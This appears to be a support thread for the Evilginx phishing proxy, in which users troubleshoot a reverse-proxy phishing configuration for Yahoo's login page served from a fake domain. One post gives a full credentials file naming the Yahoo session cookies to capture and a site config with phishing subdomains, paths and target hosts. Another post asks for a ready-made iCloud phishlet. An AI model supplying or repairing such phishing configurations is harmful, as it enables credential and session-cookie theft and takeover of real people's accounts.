set-cookies header problem

[agendasep]

hi, i am making a config for yahoo and have problem with set-cookies header. it is: set-cookie: AS=v=1&s=MGDmtRQc; path=/; domain=.login.yahoo.com; secure; HttpOnly and as you see it have secure flag. i think library can't change domain so it pass to browser with wrong domain and can't set in cookies storage (our fake domain is e.g: fakeyahoo.com). do you have any idea? thanks

[kgretzky]

Yes, I can see the problem. To solve it you would have to create a new site .conf file for login.yahoo.com domain with similiar setup to correctly proxy requests to different domain.

This week I will be releasing a big update with more site templates. One of the templates handles the issue you described, so you will be able to see how its done.

[agendasep]

It's worked!. Thank you so much.

[kgretzky]

Awesome! Happy to help!

[leperjulien]

Hi @kgretzky

I'm actually trying the same thing as sepehrrahami, and i'm stuck at the same point he was i guess!

The page is loading on my registred domain but when i enter anything the username field it says that i must enable cookie in order to login , i tried to make my login.yahoo.com.conf similar as the one you used for icloud template but i must be doing something wrong..

Could you point me in the right direction maybe ?

My yahoo.creds looks like this

[creds] email_arg=username passwd_arg=password tokens=[{"domain":".yahoo.com","cookies":["B", "F", "HP", "PH", "SSL", "T", "U", "Y", "YLS","CH", "FPCK2", "FPS", "fpc", "fpc_s", "fpl", "fpt"]},{"domain":".login.yahoo.com","cookies":["AS"]}]

and here is my config

[site] name=yahoo site_conf=["login.yahoo.com.conf"] creds_conf=yahoo.creds phish_subdomains=["www"] phish_paths=["/?.src","/account/challenge/password"] target_hosts=["login.yahoo.com","yahoo.com"] cookie_hosts=["login.yahoo.com","yahoo.com"] redir_arg=rc success_arg=rd log_name=evilginx-yahoo.log cert_subdomains=["www"]

Thanks and awesome work btw ;)

[ghost]

Hello do you have icloud phishlet? If yes then can you share?